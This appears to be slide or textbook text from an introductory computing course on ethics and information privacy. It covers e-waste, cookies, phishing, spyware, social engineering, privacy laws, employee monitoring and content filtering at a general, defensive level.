Users should not store obsolete computers and devices in their basement,
storage room, attic, warehouse, or any other location. Computers, monitors, and other
equipment contain toxic materials and potentially dangerous elements including lead,
mercury, and flame retardants. In a landfill, these materials release into the environment.
Recycling and refurbishing old equipment are much safer alternatives for the
environment.
 ETHICS AND SOCIETY

GREEN COMPUTING
Experts estimate that more than 700 million personal computers are obsolete.
Because of the huge volumes of electronic waste, the U.S. federal government has
proposed a bill that would require computer recycling across the country. Many state and
local governments have methods in place to make it easy for consumers to recycle this
type of equipment.
To reduce the environmental impact of computing further, users simply can alter
a few habits. To learn more about green computing, complete the Green Computing
exercise on the Web Research page in each chapter of this book.
 INFORMATION PRIVACY

GREEN COMPUTING
When you fill out a printed form, such as a magazine subscription or contest
entry, or an online form to sign up for a service, create a profile on an online social
network, or register a product warranty, the merchant that receives the form usually
stores the information you provide in a database. Likewise, every time you tap or click an
advertisement on the web or perform a search online, your information and preferences
enter a database. Some merchants may sell or share the contents of their databases with
national marketing firms and Internet advertising firms. By combining this data with
information from public records, such as driver’s licenses and vehicle registrations, these
firms can create an electronic profile of individuals. Electronic profiles may include
personal details, such as your age, address, phone number, marital status, number and
ages of dependents, interests, and spending habits.
 INFORMATION PRIVACY

COOKIES
A cookie is a small text file that a web server stores on your computer. Cookie files
typically contain data about you, such as your user name, postal code, or viewing
preferences. Websites use cookies for a variety of purposes:
• Most websites that allow for personalization use cookies to track user preferences.
These cookies may obtain their values when a user fills in an online form requesting
personal information. Some websites, for example, store user names in cookies in
order to display a personalized greeting that welcomes the user, by name, back to the
website. Other websites allow users to customize their viewing experience with
preferences, such as local news headlines, the local weather forecast, or stock
quotes.
• Some websites use cookies to store user names and/or passwords, so that users do
not need to enter this information every time they sign in to the website.
 INFORMATION PRIVACY

COOKIES
• Online shopping sites generally use a session cookie to keep track of items in a user’s
shopping cart. This way, users can start an order during one web session and finish it
on another day in another session. Session cookies usually expire after a certain time,
such as a week or a month.
• Some websites use cookies to track how often users visit a site and the webpages
they visit while at the website.
• Websites may use cookies to target advertisements. These websites store a user’s
interests and browsing habits in the cookie.
 INFORMATION PRIVACY

COOKIES
Do websites ever sell information stored in cookies?
Some websites sell or trade information stored in your cookies to advertisers — a
practice many believe to be unethical. If you do not want personal information distributed, you
should limit the amount of information you provide to a website or adjust how your browser
handles cookies. You can regularly clear cookies or set your browser to accept cookies
automatically, prompt if you want to accept a cookie, or disable all cookie use. Keep in mind if
you disable cookie use, you may not be able to use some e-commerce websites. As an
alternative, you can purchase software that selectively blocks cookies.
Many commercial websites send a cookie to your browser; your computer’s hard
drive then stores the cookie. The next time you visit the website, your browser retrieves the
cookie from your hard drive and sends the data in the cookie to the website. Figure 14
illustrates how websites work with cookies. A website can read data only from its own cookie
file stored on your hard drive. That is, it cannot access or view any other data on your hard
drive — including another cookie file.
 INFORMATION PRIVACY

PHISHING
Phishing is a scam in which a perpetrator sends an official looking email
message that attempts to obtain your personal and/or financial information. These
messages look legitimate and request that you update credit card numbers, Social
Security numbers, bank account numbers, passwords, or other private information.
Clickjacking is yet another similar scam. With clickjacking, an object that can be
tapped or clicked — such as a button, image, or link — on a website, pop-up ad, pop-
under ad, or in an email message or text message contains a malicious program. When a
user taps or clicks the disguised object, a variety of nefarious events may occur. For
example, the user may be redirected to a phony website that requests personal
information, or a virus may download to the computer or mobile device. Browsers
typically include clickjacking protection.
 INFORMATION PRIVACY

SPYWARE AND ADWARE

Spyware is a program placed on a computer or mobile device without the user’s
knowledge that secretly collects information about the user and then communicates the
information it collects to some outside source while the user is online. Some vendors or
employers use spyware to collect information about program usage or employees. Internet
advertising firms often collect information about users’ web browsing habits. Spyware can
enter your computer when you install a new program, through malware, or through a graphic
on a webpage or in an email message.
Adware is a program that displays an online advertisement in a banner, a pop-up
window, or pop-under window on webpages, email messages, or other Internet services.
Adware on mobile phones is known as madware, for mobile adware. Sometimes, spyware is
hidden in adware. To remove spyware and adware, you can obtain spyware removers,
adware removers, or malware removers that can detect and delete spyware and adware.
Some operating systems and browsers include spyware and adware removers.
 INFORMATION PRIVACY

SOCIAL ENGINEERING
As related to the use of technology, social engineering is defined as gaining
unauthorized access to or obtaining confidential information by taking advantage of the
trusting human nature of some victims and the naivety of others. Some social engineers
trick their victims into revealing confidential information, such as user names and
passwords, on the phone, in person, or on the Internet. Techniques they use include
pretending to be an administrator or other authoritative figure, feigning an emergency
situation, or impersonating an acquaintance. Social engineers also obtain information
from users who do not destroy or conceal information properly. These perpetrators sift
through company dumpsters, watch or film people dialing phone numbers or using ATMs,
and snoop around computers or mobile devices looking for openly displayed confidential
information.
 INFORMATION PRIVACY

SOCIAL ENGINEERING
To protect yourself from social engineering scams, follow these tips:
• Verify the identity of any person or organization requesting personal or confidential
information.
• When relaying personal or confidential information, ensure that only authorized people
can hear your conversation.
• When personal or confidential information appears on a computer or mobile device,
ensure that only authorized people can see your screen.
• Shred all sensitive or confidential documents.
• After using a public computer, clear the cache in its browser.
• Avoid using public computers to conduct banking or other sensitive transactions.
 INFORMATION PRIVACY

PRIVACY LAWS
The concern about privacy has led to the enactment of federal and state laws
regarding the storage and disclosure of personal data, some of which are shown in the
table below. Common points in some of these laws are as follows:
1. Information collected and stored about individuals should be limited to what is necessary to
carry out the function of the business or government agency collecting the data.
2. Once collected, provisions should be made to protect the data so that only those
employees within the organization who need access to it to perform their job duties have
access to it.
3. Personal information should be released outside the organization collecting the data only
when the person has agreed to its disclosure.
4. When information is collected about an individual, the individual should know that the data
is being collected and have the opportunity to determine the accuracy of the data.
 INFORMATION PRIVACY

PRIVACY LAWS
 INFORMATION PRIVACY

EMPLOYEE MONITORING
Employee monitoring involves the use of computers, mobile devices, or
cameras to observe, record, and review an employee’s use of a technology, including
communications such as email messages, keyboard activity (used to measure
productivity), and websites visited. Many programs exist that easily allow employers to
monitor employees. Further, it is legal for employers to use these programs.
 INFORMATION PRIVACY

CONTENT FILTERING
One of the more controversial issues that surround the Internet is its widespread
availability of objectionable material, such as prejudiced literature, violence, and obscene
photos. Some believe that such materials should be banned . Others believe that the
materials should be filtered, that is, restricted.
Content filtering is the process of restricting access to certain material. Many
businesses use content filtering to limit employees’ web access. These businesses argue
that employees are unproductive when visiting inappropriate or objectionable websites.
Some schools, libraries, and parents use content filtering to restrict access to minors.
Content filtering opponents argue that banning any materials violates constitutional
guarantees of free speech and personal rights.
 INFORMATION PRIVACY

CONTENT FILTERING
Web filtering software is a program that restricts access to specified websites.
Some also filter sites that use specific words (Figure 5). Others allow you to filter email
messages, chat rooms, and programs. Many Internet security programs include a
firewall, antivirus program, and filtering capabilities combined. Browsers also often
include content filtering capabilities.
END!